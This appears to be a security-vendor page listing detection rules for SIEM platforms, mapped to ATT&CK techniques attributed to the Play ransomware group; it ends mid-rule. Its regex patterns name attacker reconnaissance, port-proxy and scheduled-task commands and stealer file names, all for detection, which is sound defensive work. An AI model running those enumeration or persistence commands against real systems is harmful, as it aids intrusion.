Tool
Hunt pack: Play
990 vendor-native detections · ready to paste into your SIEM · cross-linked to ATT&CK
Vendor-native detections covering the ATT&CK techniques attributed to Play - a ready-to-deploy hunt pack across Splunk, Elastic and Sentinel.
◈
Detections
50 shown of 990Suspicious Activity Reported by Okta User
Detects when a user reports suspicious activity for their Okta account. These events should be investigated, as they can
help security teams identify when an adversary is attempting to gain access to their network.
Unusual Parent Process for cmd.exe
Identifies a suspicious parent child process relationship with cmd.exe descending from an unusual process.
Unusual Print Spooler Child Process
Detects unusual Print Spooler service (spoolsv.exe) child processes. This may indicate an attempt to exploit privilege
escalation vulnerabilities related to the Printing Service on Windows.
aws_console_login_without_mfa
Detect when a user logs into AWS console without MFA.
Show query
rule aws_console_login_without_mfa {
meta:
author = "Google Cloud Security"
description = "Detect when a user logs into AWS console without MFA."
rule_id = "mr_b03d1e57-7ed0-49e7-b125-6c18b364ae8c"
rule_name = "AWS Console Login Without MFA"
mitre_attack_tactic = "Initial Access"
mitre_attack_technique = "Valid Accounts: Cloud Accounts"
mitre_attack_url = "https://attack.mitre.org/techniques/T1078/004/"
mitre_attack_version = "v13.1"
type = "Alert"
data_source = "AWS CloudTrail"
platform = "AWS"
severity = "Low"
priority = "Low"
events:
$login.metadata.vendor_name = "AMAZON"
$login.metadata.product_name = "AWS CloudTrail"
$login.metadata.event_type = "USER_LOGIN"
$login.metadata.product_event_type = "ConsoleLogin"
$login.security_result.action= "ALLOW"
$login.extensions.auth.auth_details = "MFAUsed: No"
$login.additional.fields["recipientAccountId"] = $account_id
match:
$account_id over 1h
outcome:
$risk_score = max(
//Baseline
35 +
if($login.principal.resource.type = "Root", 50)
)
$mitre_attack_tactic = "Initial Access"
$mitre_attack_technique = "Valid Accounts: Cloud Accounts"
$mitre_attack_technique_id = "T1078.004"
$event_count = count_distinct($login.metadata.id)
$network_http_user_agent = array_distinct($login.network.http.user_agent)
$principal_ip = array_distinct($login.principal.ip)
$principal_ip_country = array_distinct($login.principal.ip_geo_artifact.location.country_or_region)
$principal_ip_state = array_distinct($login.principal.ip_geo_artifact.location.state)
$target_user_display_name = array_distinct($login.target.user.user_display_name)
$target_user_userid = array_distinct($login.target.user.userid)
$is_mfa_used = array_distinct($login.extensions.auth.auth_details)
$target_resource_name = array_distinct($login.target.resource.name)
$target_resource_product_object_id = array_distinct($login.target.resource.product_object_id)
condition:
$login
}entra_id_login_activity_to_uncommon_mscloud_apps
This rule detects Azure AD login activity to apps other than a defined list of first party MS Cloud Apps. Note that Azure Active Directory PowerShell and custom Azure apps are not in this list by default
Show query
rule entra_id_login_activity_to_uncommon_mscloud_apps {
meta:
author = "Google Cloud Security"
description = "This rule detects Azure AD login activity to apps other than a defined list of first party MS Cloud Apps. Note that Azure Active Directory PowerShell and custom Azure apps are not in this list by default"
assumption = "The lists first_party_ms_cloud_apps is populated and tuned as needed"
rule_id = "mr_1a39c017-9045-48d4-928d-096511edf3cc"
rule_name = "Entra ID Login Activity to Uncommon MS Cloud Apps"
tactic = "TA0001"
technique = "T1078.004"
reference = "https://learn.microsoft.com/en-us/troubleshoot/azure/active-directory/verify-first-party-apps-sign-in"
type = "alert"
platform = "azure"
data_source = "azure ad"
severity = "Low"
priority = "Low"
events:
$login.metadata.event_type = "USER_LOGIN"
$login.metadata.product_name = "Azure AD"
$login.metadata.vendor_name = "Microsoft"
$login.security_result.action = "ALLOW"
not $login.target.resource.attribute.labels["App Id"] in %first_party_ms_cloud_apps
// Below is to filter ADFS Sync Account that runs every 30 minutes between AD and Azure; can use userid or email address
//$login.target.user.userid = "insert your userid here"
$login.target.user.user_display_name != "On-Premises Directory Synchronization Service Account"
$login.target.user.userid = $userid
match:
$userid over 5m
outcome:
$risk_score = 35
$event_count = count_distinct($login.metadata.id)
$target_application = array_distinct($login.target.application)
$traget_application_guid = array_distinct($login.target.resource.attribute.labels["App Id"])
$security_description = array_distinct($login.security_result.description)
$security_summary = array_distinct($login.security_result.summary)
$country_region_login_attempt = array_distinct(strings.concat($login.principal.location.city," ",$login.principal.location.state," ",$login.principal.location.country_or_region))
//Used for match condition, don't need as outcome variable as well
//$target_user_userid = array_distinct($login.target.user.userid)
condition:
$login
}gcp_admin_privileged_roles_added_to_service_accounts
Detect when admin privileged roles such as Owner or Editor are added to a Service Account.
Show query
rule gcp_admin_privileged_roles_added_to_service_accounts {
meta:
author = "Google Cloud Security"
description = "Detect when admin privileged roles such as Owner or Editor are added to a Service Account."
rule_id = "mr_9ffebc73-6d73-40bd-8973-2d53a810272f"
rule_name = "GCP Admin Privileged Roles Added To Service Accounts"
mitre_attack_tactic = "Persistence, Privilege Escalation"
mitre_attack_technique = "Account Manipulation: Additional Cloud Roles"
mitre_attack_url = "https://attack.mitre.org/techniques/T1098/003/"
mitre_attack_version = "v14.1"
type = "Alert"
data_source = "GCP Cloud Audit"
platform = "GCP"
severity = "Low"
priority = "Low"
events:
$gcp.metadata.event_type = "USER_RESOURCE_UPDATE_PERMISSIONS"
$gcp.metadata.log_type = "GCP_CLOUDAUDIT"
$gcp.metadata.product_event_type = "SetIamPolicy"
$gcp.security_result.action = "ALLOW"
$gcp.target.resource.attribute.labels["ser_binding_deltas_action"] = "ADD"
$gcp.target.resource.attribute.labels["ser_binding_deltas_role"] = /roles\/owner.*|roles\/editor.*/ nocase
$gcp.target.resource.attribute.labels["ser_binding_deltas_member"] = /^serviceAccount/ nocase
outcome:
$risk_score = max(35)
$mitre_attack_tactic = "Persistence, Privilege Escalation"
$mitre_attack_technique = "Account Manipulation: Additional Cloud Roles"
$mitre_attack_technique_id = "T1098.003"
$event_count = count_distinct($gcp.metadata.id)
$network_http_user_agent = array_distinct($gcp.network.http.user_agent)
$principal_ip = array_distinct($gcp.principal.ip)
$principal_ip_country = array_distinct($gcp.principal.ip_geo_artifact.location.country_or_region)
$principal_ip_state = array_distinct($gcp.principal.ip_geo_artifact.location.state)
$principal_user_id = $gcp.principal.user.userid
$principal_user_display_name = $gcp.principal.user.user_display_name
$target_resource_name = $gcp.target.resource.name
$event_name = $gcp.metadata.product_event_type
$target_email_addresses = array_distinct($gcp.target.user.email_addresses)
condition:
$gcp
}google_workspace_password_policy_changed
Identifies when Google Workspace password policy is changed. Security teams can monitor for changes to password policy configuration that may weaken the organization's security posture.
Show query
rule google_workspace_password_policy_changed {
meta:
author = "Google Cloud Security"
description = "Identifies when Google Workspace password policy is changed. Security teams can monitor for changes to password policy configuration that may weaken the organization's security posture."
rule_id = "mr_fd63a810-800a-4c55-97d2-080fc8a0e567"
rule_name = "Google Workspace Password Policy Changed"
mitre_attack_tactic = "Persistence"
mitre_attack_technique = "Account Manipulation"
mitre_attack_url = "https://attack.mitre.org/techniques/T1098/"
mitre_attack_version = "v13.1"
type = "Alert"
data_source = "Workspace Activity"
severity = "Low"
priority = "Low"
events:
$ws.metadata.vendor_name = "Google Workspace"
$ws.metadata.product_name = "admin"
($ws.metadata.product_event_type = "CREATE_APPLICATION_SETTING" or
$ws.metadata.product_event_type = "CHANGE_APPLICATION_SETTING")
$ws.security_result.category_details = "APPLICATION_SETTINGS"
$ws.target.resource.name = /Password Management/
$ws.principal.user.email_addresses = $email
match:
$email over 1h
outcome:
$risk_score = max(35)
$mitre_attack_tactic = "Persistence"
$mitre_attack_technique = "Account Manipulation"
$mitre_attack_technique_id = "T1098"
$event_count = count_distinct($ws.metadata.id)
$principal_ip = array_distinct($ws.principal.ip)
$principal_country = array_distinct($ws.principal.ip_geo_artifact.location.country_or_region)
$principal_state = array_distinct($ws.principal.ip_geo_artifact.location.state)
$principal_user_emails = array_distinct($ws.principal.user.email_addresses)
$principal_user_id = array_distinct($ws.principal.user.userid)
$target_application =array_distinct($ws.target.application)
$password_policies =array_distinct($ws.target.resource.name)
condition:
$ws
}local_accounts_discovery
Local accounts, System Owner/User discovery using operating systems utilities
Show query
rule local_accounts_discovery {
meta:
author = "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community"
description = "Local accounts, System Owner/User discovery using operating systems utilities"
reference = "https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml"
license = "https://github.com/SigmaHQ/Detection-Rule-License/blob/main/LICENSE.Detection.Rules.md"
rule_name = "Local Accounts Discovery"
sigma_uuid = "502b42de-4306-40b4-9596-6f590c81f073"
sigma_status = "test"
rule_id = "mr_3a6b5c72-8126-4f43-a4ac-9c8bbac7fa72"
tactic = "TA0007"
technique = "T1033"
type = "Detection"
data_source = "Sysmon"
platform = "Windows"
severity = "Low"
priority = "Low"
false_positives = "Legitimate administrator or user enumerates local users for legitimate reason"
events:
$process.metadata.event_type = "PROCESS_LAUNCH"
(
(
re.regex($process.target.process.file.full_path, `\\cmd\.exe$`) nocase and
strings.contains(strings.to_lower($process.target.process.command_line), " /c") and
strings.contains(strings.to_lower($process.target.process.command_line), "dir ") and
strings.contains(strings.to_lower($process.target.process.command_line), "\\users\\") and
NOT strings.contains(strings.to_lower($process.target.process.command_line), " rmdir ")
)
or
(
re.regex($process.target.process.file.full_path, `\\net\.exe$`) nocase or
re.regex($process.target.process.file.full_path, `\\net1\.exe$`) nocase and
strings.contains(strings.to_lower($process.target.process.command_line), "user") and
NOT strings.contains(strings.to_lower($process.target.process.command_line), "/domain") and
NOT strings.contains(strings.to_lower($process.target.process.command_line), "/add") and
NOT strings.contains(strings.to_lower($process.target.process.command_line), "/delete") and
NOT strings.contains(strings.to_lower($process.target.process.command_line), "/active") and
NOT strings.contains(strings.to_lower($process.target.process.command_line), "/expires") and
NOT strings.contains(strings.to_lower($process.target.process.command_line), "/passwordreq") and
NOT strings.contains(strings.to_lower($process.target.process.command_line), "/scriptpath") and
NOT strings.contains(strings.to_lower($process.target.process.command_line), "/times") and
NOT strings.contains(strings.to_lower($process.target.process.command_line), "/workstations")
)
or
(
re.regex($process.target.process.file.full_path, `\\whoami\.exe$`) nocase or
re.regex($process.target.process.file.full_path, `\\quser\.exe$`) nocase or
re.regex($process.target.process.file.full_path, `\\qwinsta\.exe$`) nocase or
(
re.regex($process.target.process.file.full_path, `\\wmic\.exe$`) nocase and
strings.contains(strings.to_lower($process.target.process.command_line), "useraccount") and
strings.contains(strings.to_lower($process.target.process.command_line), "get")
) or
(
re.regex($process.target.process.file.full_path, `\\cmdkey\.exe$`) nocase and
strings.contains(strings.to_lower($process.target.process.command_line), " /l")
)
)
)
$process.principal.hostname = $hostname
match:
$hostname over 5m
outcome:
//example usage of specifying test user and hostname to adjust risk score
$risk_score = max(if($process.principal.user.userid = "user" and $process.principal.hostname = "hostname", 0, 15))
$principal_process_pid = array_distinct($process.principal.process.pid)
$principal_process_command_line = array_distinct($process.principal.process.command_line)
$principal_process_file_sha256 = array_distinct($process.principal.process.file.sha256)
$principal_process_file_full_path = array_distinct($process.principal.process.file.full_path)
$principal_process_product_specfic_process_id = array_distinct($process.principal.process.product_specific_process_id)
$principal_process_parent_process_product_specfic_process_id = array_distinct($process.principal.process.parent_process.product_specific_process_id)
$target_process_pid = array_distinct($process.target.process.pid)
$target_process_command_line = array_distinct($process.target.process.command_line)
$target_process_file_sha256 = array_distinct($process.target.process.file.sha256)
$target_process_file_full_path = array_distinct($process.target.process.file.full_path)
$target_process_product_specfic_process_id = array_distinct($process.target.process.product_specific_process_id)
$principal_user_userid = array_distinct($process.principal.user.userid)
$log_type = array_distinct(strings.concat($process.metadata.log_type,"/",$process.metadata.product_event_type))
condition:
$process
}okta_user_login_out_of_hours
Detects out of hours successful authentication.
Show query
rule okta_user_login_out_of_hours {
meta:
author = "Google Cloud Security"
description = "Detects out of hours successful authentication."
rule_id = "mr_36840037-a41c-47d0-b0eb-4096f28855e1"
rule_name = "Okta User Login Out Of Hours"
reference = "https://support.okta.com/help/s/article/User-Signin-and-Recovery-Events-in-the-Okta-System-Log"
mitre_attack_tactic = "Defense Evasion, Persistence, Privilege Escalation, Initial Access"
mitre_attack_technique = "Valid Accounts"
mitre_attack_url = "https://attack.mitre.org/techniques/T1078/"
mitre_attack_version = "v13.1"
type = "Alert"
data_source = "Okta"
severity = "Low"
priority = "Low"
events:
$login.metadata.product_name = "Okta"
$login.metadata.vendor_name = "Okta"
$login.metadata.event_type = "USER_LOGIN"
$login.target.user.email_addresses = $user
$login.security_result.action = "ALLOW"
$login.metadata.event_timestamp.seconds = $timestamp
(
01 = timestamp.get_day_of_week($timestamp, "UTC") or //Sunday
07 = timestamp.get_day_of_week($timestamp, "UTC") //Saturday
)
match:
$user over 1h
outcome:
$risk_score = max(
if (01 = timestamp.get_day_of_week($timestamp, "UTC"), 10) +
if (07 = timestamp.get_day_of_week($timestamp, "UTC"), 15) +
if ( ( timestamp.get_hour($timestamp, "UTC") >= 0 and timestamp.get_hour($timestamp,"UTC")<= 7) or timestamp.get_hour($timestamp,"UTC") > 20, 50)
)
$mitre_attack_tactic = "Defense Evasion, Persistence, Privilege Escalation, Initial Access"
$mitre_attack_technique = "Valid Accounts"
$principal_ip = array_distinct($login.principal.ip)
$principal_ip_country = array_distinct($login.principal.ip_geo_artifact.location.country_or_region)
$principal_ip_state = array_distinct($login.principal.ip_geo_artifact.location.state)
$principal_ip_city = array_distinct($login.principal.location.city)
$security_result_summary = array_distinct($login.security_result.summary)
$principal_user_managers_email_addresses = array_distinct($login.principal.user.managers.email_addresses)
$principal_user_userid = array_distinct($login.principal.user.userid)
$dc_principal_user_userid = count_distinct($login.principal.user.userid)
$target_user_email_addresses = array_distinct($login.target.user.email_addresses)
$target_user_userid = array_distinct($login.target.user.userid)
$target_user_agent = array_distinct($login.network.http.user_agent)
$security_result_description = array_distinct($login.security_result.description)
condition:
$login
}port_proxy_forwarding_T1090_cisa_report
Detects port forwarding being enabled using netsh command and registry settings created or modified in support of portproxy v4tov4
Show query
rule port_proxy_forwarding_T1090_cisa_report {
meta:
author = "Google Cloud Security"
description = "Detects port forwarding being enabled using netsh command and registry settings created or modified in support of portproxy v4tov4"
rule_id = "mr_4c6f2d66-ed6f-4dda-bd2f-7c545898468b"
rule_name = "MITRE ATT&CK T1090 Port Proxy Forwarding CISA Report"
type = "hunt"
platform = "Windows"
data_source = "microsoft sysmon, windows event log"
tactic = "TA0011"
technique = "T1090"
reference = "https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF"
severity = "Low"
priority = "Low"
events:
(
$process.metadata.event_type = "PROCESS_LAUNCH" and
// cisa report referenced cmd /c in their report throughout, can filter this in/out for tuning as needed
re.regex($process.target.process.command_line, `(|cmd.*/c).*netsh.*interface.*portproxy.*add.*v4tov4`) nocase
// For greater precision to align with the report, comment out the above line and uncomment the below line to incorporate exact ports referenced
//re.regex($process.target.process.command_line, `(|cmd.*/c).*netsh.*interface.*portproxy.*add.*v4tov4.*port\=(9999|50100).*port\=(8443|1433)`) nocase
)
or
(
// Looks for the actual registry creation or modification that would accompany portproxy command executing
(
$process.metadata.event_type = "REGISTRY_CREATION" or
$process.metadata.event_type = "REGISTRY_MODIFICATION"
) and
$process.target.registry.registry_key = "HKLM\\System\\CurrentControlSet\\Services\\PortProxy\\v4tov4"
)
$process.principal.hostname = $hostname
match:
$hostname over 5m
outcome:
$risk_score = 35
$event_count = count_distinct($process.metadata.id)
// added to populate alert graph with additional context
// Commented out principal.hostname because it is already represented in graph as match variable. If match changes, can uncomment to add to results
//$principal_hostname = array_distinct($process.principal.hostname)
$principal_process_pid = array_distinct($process.principal.process.pid)
$principal_process_command_line = array_distinct($process.principal.process.command_line)
$principal_process_file_sha256 = array_distinct($process.principal.process.file.sha256)
$principal_process_file_full_path = array_distinct($process.principal.process.file.full_path)
$principal_process_product_specific_process_id = array_distinct($process.principal.process.product_specific_process_id)
$principal_process_parent_process_product_specific_process_id = array_distinct($process.principal.process.parent_process.product_specific_process_id)
$target_process_pid = array_distinct($process.target.process.pid)
$target_process_command_line = array_distinct($process.target.process.command_line)
$target_process_file_sha256 = array_distinct($process.target.process.file.sha256)
$target_process_file_full_path = array_distinct($process.target.process.file.full_path)
$target_process_product_specific_process_id = array_distinct($process.target.process.product_specific_process_id)
$principal_user_userid = array_distinct($process.principal.user.userid)
condition:
$process
}recon_environment_enumeration_network_cisa_report
Detects network enumeration commands as identified in CISA Living off the Land pdf. Alone they may be normal but in concert, they may be worth looking into
Show query
rule recon_environment_enumeration_network_cisa_report {
meta:
author = "Google Cloud Security"
description = "Detects network enumeration commands as identified in CISA Living off the Land pdf. Alone they may be normal but in concert, they may be worth looking into"
rule_id = "mr_9ca49a46-fb60-4ada-b722-5714d5cb7f53"
rule_name = "Recon Environment Enumeration Network CISA Report"
type = "hunt"
platform = "Windows"
data_source = "microsoft sysmon, windows event logs"
tactic = "TA0007"
technique = "T1016"
reference = "https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF"
severity = "Low"
priority = "Low"
events:
(
$process.metadata.event_type = "PROCESS_LAUNCH" and
(
// cisa report referenced cmd /c in their report throughout, can filter this in/out for tuning as needed
re.regex($process.target.process.command_line, `(|cmd.*/c).*arp.*-a`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*curl.*www.ip-api.com`) nocase or
// the following line is a broader look at dnscmd /enumrecords not explicitly called out in the report can comment out if not needed
//re.regex($process.target.process.command_line, `(|cmd.*/c).*dnscmd.*/enumrecords`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*dnscmd.*/enumrecords.*/zone`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*dnscmd.*/enumzones`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*dnscmd.*/enumrecords.*/additional`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*ipconfig.*/all`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*netsh.*interface.*firewall.*show`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*netsh.*interface.*portproxy.*show`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*netsh.*interface.*portproxy.*show.*v4tov4`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*netsh.*firewall.*show`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*netsh.*portproxy.*show.*v4tov4`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*netstat.*-ano`) nocase
)
)
or
(
// C2 like Covenant will mask curl command running from PowerShell; added this to detect DNS lookup for this site as another method to identify
$process.metadata.event_type = "NETWORK_DNS" and
$process.network.application_protocol = "DNS" and
$process.network.dns.questions.name = "www.ip-api.com"
)
$process.principal.hostname = $hostname
$process.target.process.command_line = $command_line
match:
$hostname over 15m
outcome:
$risk_score = 35
$event_count = count_distinct($process.metadata.id)
$unique_command_line_threshold = 5
// added to populate alert graph with additional context
// Commented out principal.hostname because it is already represented in graph as match variable. If match changes, can uncomment to add to results
//$principal_hostname = array_distinct($process.principal.hostname)
$principal_process_pid = array_distinct($process.principal.process.pid)
$principal_process_command_line = array_distinct($process.principal.process.command_line)
$principal_process_file_sha256 = array_distinct($process.principal.process.file.sha256)
$principal_process_file_full_path = array_distinct($process.principal.process.file.full_path)
$principal_process_product_specific_process_id = array_distinct($process.principal.process.product_specific_process_id)
$principal_process_parent_process_product_specific_process_id = array_distinct($process.principal.process.parent_process.product_specific_process_id)
$target_process_pid = array_distinct($process.target.process.pid)
$target_process_command_line = array_distinct($process.target.process.command_line)
$target_process_file_sha256 = array_distinct($process.target.process.file.sha256)
$target_process_file_full_path = array_distinct($process.target.process.file.full_path)
$target_process_product_specific_process_id = array_distinct($process.target.process.product_specific_process_id)
$principal_user_userid = array_distinct($process.principal.user.userid)
condition:
// modify the condition value for command line to throttle how many of these commands can be issued until the rule is triggered
$process and #command_line > 5
}recon_environment_enumeration_system_cisa_report
Detects system enumeration events as identified in CISA Living off the Land pdf. Alone they may be normal but in concert, they may be worth looking into
Show query
rule recon_environment_enumeration_system_cisa_report {
meta:
author = "Google Cloud Security"
description = "Detects system enumeration events as identified in CISA Living off the Land pdf. Alone they may be normal but in concert, they may be worth looking into"
rule_id = "mr_086dede6-33ba-42df-b001-5595ceb0d589"
rule_name = "Recon Environment Enumeration System CISA Report"
type = "hunt"
platform = "Windows"
data_source = "microsoft sysmon, windows event logs"
tactic = "TA0007"
technique = "T1082"
reference = "https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF"
severity = "Low"
priority = "Low"
events:
$process.metadata.event_type = "PROCESS_LAUNCH"
$process.principal.hostname = $hostname
$process.target.process.command_line = $command_line
re.regex($process.target.process.command_line, `wevtutil.*qe.*security.*\/rd:true.*\/f:text.*\/q:.*\[System\[\(EventID`) nocase
// below is the more specific command down to the event id, could comment out the about and use this instead if desired
//re.regex($process.target.process.command_line, `wevtutil.*qe.*security.*\/rd:true.*\/f:text.*\/q:\*\[System\[\(EventID=4624\).*TimeCreated\[@SystemTime.*\]\].*EventData\[Data.*\]\]`) nocase
or
// cisa report referenced cmd /c in their report throughout, can filter this in/out for tuning as desired
// other wmic switches like /user and /password, these have been excluded to focus on the commands being issued since local access does not require these
(
re.regex($process.target.process.command_line, `(|cmd.*/c).*ldifde.exe.*-f.*-p.*subtree`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*reg.*query.*hklm\\software\\`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*systeminfo`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*tasklist.*\/v`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*whoami`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*wmic.*volume.*list.*brief`) nocase or
// cisa report called out wmic volume list brief, below is alternate that removed brief to widen criteria
//re.regex($process.target.process.command_line, `(|cmd.*/c).*wmic.*volume.*list`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*wmic.*service.*brief`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*wmic.*product.*list.*brief`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*wmic.*baseboard.*list.*full`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*wmic.*path.*win32_logicaldisk.*get.*(caption|filesystem|freespace|size|volumename)`) nocase
)
match:
$hostname over 15m
outcome:
$risk_score = 35
$event_count = count_distinct($process.metadata.id)
$unique_command_line_threshold = max(5)
// added to populate alert graph with additional context
// Commented out principal.hostname because it is already represented in graph as match variable. If match changes, can uncomment to add to results
//$principal_hostname = array_distinct($process.principal.hostname)
$principal_process_pid = array_distinct($process.principal.process.pid)
$principal_process_command_line = array_distinct($process.principal.process.command_line)
$principal_process_file_sha256 = array_distinct($process.principal.process.file.sha256)
$principal_process_file_full_path = array_distinct($process.principal.process.file.full_path)
$principal_process_product_specific_process_id = array_distinct($process.principal.process.product_specific_process_id)
$principal_process_parent_process_product_specific_process_id = array_distinct($process.principal.process.parent_process.product_specific_process_id)
$target_process_pid = array_distinct($process.target.process.pid)
$target_process_command_line = array_distinct($process.target.process.command_line)
$target_process_file_sha256 = array_distinct($process.target.process.file.sha256)
$target_process_file_full_path = array_distinct($process.target.process.file.full_path)
$target_process_product_specific_process_id = array_distinct($process.target.process.product_specific_process_id)
$principal_user_userid = array_distinct($process.principal.user.userid)
condition:
// modify the condition value for command line to throttle how many of these commands can be issued until the rule is triggered
$process and #command_line > 5
}sap_break_glass_account_login
Alerts whenever a default SAP administrative account (e.g., SAP*, DDIC, TMSADM) logs into the system. These accounts should be locked and used only for emergency 'break-glass' scenarios
Show query
rule sap_break_glass_account_login {
meta:
author = "Google Cloud Security"
description = "Alerts whenever a default SAP administrative account (e.g., SAP*, DDIC, TMSADM) logs into the system. These accounts should be locked and used only for emergency 'break-glass' scenarios"
severity = "Low"
tactic = "TA0001"
technique = "T1078"
events:
$e.metadata.log_type = "SAP_SECURITY_AUDIT"
(
$e.additional.fields["msg_1"] = /^AU1$|^AU5$/ or
$e.metadata.event_type = "USER_LOGIN"
)
$e.principal.user.userid = $userid
$userid = /^DDIC$|^EARLYWATCH$|^SAP\*$|^TMSADM$/ nocase
match:
$userid over 1h
outcome:
$event_count = count_distinct($e.metadata.id)
$risk_score = if($event_count < 10, 20, 40)
$vendor_name = array_distinct($e.metadata.vendor_name)
$product_name = array_distinct($e.metadata.product_name)
$product_severity = array_distinct($e.security_result.severity)
$event_description = array_distinct($e.metadata.description)
$victim_name = array_distinct($e.target.user.userid)
$adversary_name = array_distinct($e.principal.user.userid)
$result_time = min($e.metadata.event_timestamp.seconds)
condition:
$e
}sap_gateway_acl_bypass_attempt
Detects rejected connections by Gateway ACLs (secinfo/reginfo), indicating an attempt to bypass network-layer security.
Show query
rule sap_gateway_acl_bypass_attempt {
meta:
author = "Google Cloud Security"
description = "Detects rejected connections by Gateway ACLs (secinfo/reginfo), indicating an attempt to bypass network-layer security."
severity = "Low"
tactic = "TA0001"
technique = "T1190"
events:
$e.metadata.product_name = "SAP_GATEWAY"
$e.additional.fields["event_action"] = /secinfo|reginfo/ nocase
$e.security_result.action = "BLOCK"
$source_ip = $e.principal.ip
match:
$source_ip over 30m
outcome:
$risk_score = 5
$acl_type = array_distinct($e.additional.fields["event_action"])
$attempted_programs = array_distinct($e.target.process.file.full_path)
$error_details = array_distinct($e.security_result.description)
$user_context = array_distinct($e.principal.user.userid)
$total_denials = count($e.metadata.product_log_id)
condition:
$e
}AWS Bedrock Unauthorized Foundation Model Access Attempt
Identifies failed, access-denied attempts to enable account-level access to an Amazon Bedrock foundation model, either
by granting a foundation-model entitlement, submitting a use case for model access, or creating a foundation-model
agreement (accepting the EULA). These account-level "model access" actions unlock a foundation model so that it can
subsequently be invoked. A principal that is repeatedly denied when attempting these actions may be a compromised or
under-privileged identity probing for the ability to unlock expensive models (LLMjacking) or to establish a durable
ability to invoke models. Unlike the companion rule that detects successful model-access grants, this rule surfaces the
attempt itself, which is a high-signal indicator of credential boundary-testing even though access was not granted.
AWS Bedrock Unauthorized Resource-Based Policy Modification Attempt
Detects failed, access-denied attempts to modify or delete resource-based access policies on AWS Bedrock resources via
the PutResourcePolicy and DeleteResourcePolicy API calls. Resource-based policies govern which principals (including
external accounts) may access Bedrock resources such as agents, knowledge bases, and custom models. A principal that is
repeatedly denied when attempting to attach or remove these policies may be a compromised or under-privileged identity
probing for the ability to grant external or cross-account access, or to weaken existing access controls. Unlike the
companion rule that detects successful changes, this rule surfaces the attempt itself, which is a high-signal indicator
of credential boundary-testing even though no change occurred.
Azure Automation Account Created
Identifies when an Azure Automation account is created. Azure Automation accounts can be used to automate management
tasks and orchestrate actions across systems. An adversary may create an Automation account in order to maintain
persistence in their target's environment.
File and Directory Discovery
Enumeration of files and directories using built-in tools. Adversaries may use the information discovered to plan
follow-on activity.
Kubernetes Unusual Decision by User Agent
This rule detects unusual request responses in Kubernetes audit logs through the use of the
"new_terms" rule type. In production environments, default API requests are typically made by
system components or trusted users, who are expected to have a consistent user agent and
allowed response annotations. By monitoring for anomalies in the username and response
annotations, this rule helps identify potential unauthorized access or misconfigurations
in the Kubernetes environment.
Potential Cross Site Scripting (XSS)
Cross-Site Scripting (XSS) is a type of attack in which malicious scripts are injected into trusted websites. In XSS
attacks, an attacker uses a benign web application to send malicious code, generally in the form of a browser-side
script. This detection rule identifies the potential malicious executions of such browser-side scripts.
Process Discovery via Tasklist
Adversaries may attempt to get information about running processes on a system.
Strace Process Activity
Strace is a useful diagnostic, instructional, and debugging tool. This rule identifies a privileged context execution of
strace which can be used to escape restrictive environments by instantiating a shell in order to elevate privileges or
move laterally.
Suspicious Print Spooler SPL File Created
Detects attempts to exploit privilege escalation vulnerabilities related to the Print Spooler service including
CVE-2020-1048 and CVE-2020-1337.
System Information Discovery via dmidecode from Parent Shell
This rule detects the use of dmidecode to gather system information from a Linux host when executed from a parent
shell process. Adversaries may use dmidecode to collect detailed hardware and system information, which can aid in
further exploitation or lateral movement within a network, or be used as a fingerprint for a compromised system.
User Discovery via Whoami
The whoami application was executed on a Linux host. This is often used by tools and persistence mechanisms to test for
privileged access.
T1053_005_windows_creation_of_scheduled_task
Creation of scheduled task using command line
Show query
rule T1053_005_windows_creation_of_scheduled_task
{
meta:
author = "Google Cloud Security"
description = "Creation of scheduled task using command line"
reference = "https://attack.mitre.org/techniques/T1053/005/"
yara_version = "YL2.0"
rule_version = "1.0"
events:
re.regex($e1.principal.process.command_line, `schtasks /create`) nocase
condition:
$e1
}a_variant_of_data_stealer_trojan_activity
This rule detects a stealer behaviour. Malware deletes itself License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule a_variant_of_data_stealer_trojan_activity {
meta:
author = "Emir Erdogan"
description = "This rule detects a stealer behaviour. Malware deletes itself License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
reference = "https://tdm.socprime.com/tdm/info/f9ZYj4C5CNBg"
version = "0.01"
created = "2021-03-09"
product = "windows"
service = "sysmon"
mitre = "T1129, T1003, T1114, T1012, T1107"
events:
((re.regex($selection.target.process.file.full_path, `.*/ralord\.exe`) or re.regex($selection.target.process.file.full_path, `.*/lodron\.exe`) or re.regex($selection.target.process.file.full_path, `.*/019\.exe`) or re.regex($selection.target.process.file.full_path, `.*/016\.exe`)) and (re.regex($selection.principal.process.file.full_path, `.*/setup_file\.exe`) or re.regex($selection.principal.process.file.full_path, `.*/setup_installer\.exe`)))
condition:
$selection
}agenttesla_rat_detection
AgentTesla RAT Detection License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule agenttesla_rat_detection {
meta:
author = "Emir Erdogan"
description = "AgentTesla RAT Detection License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
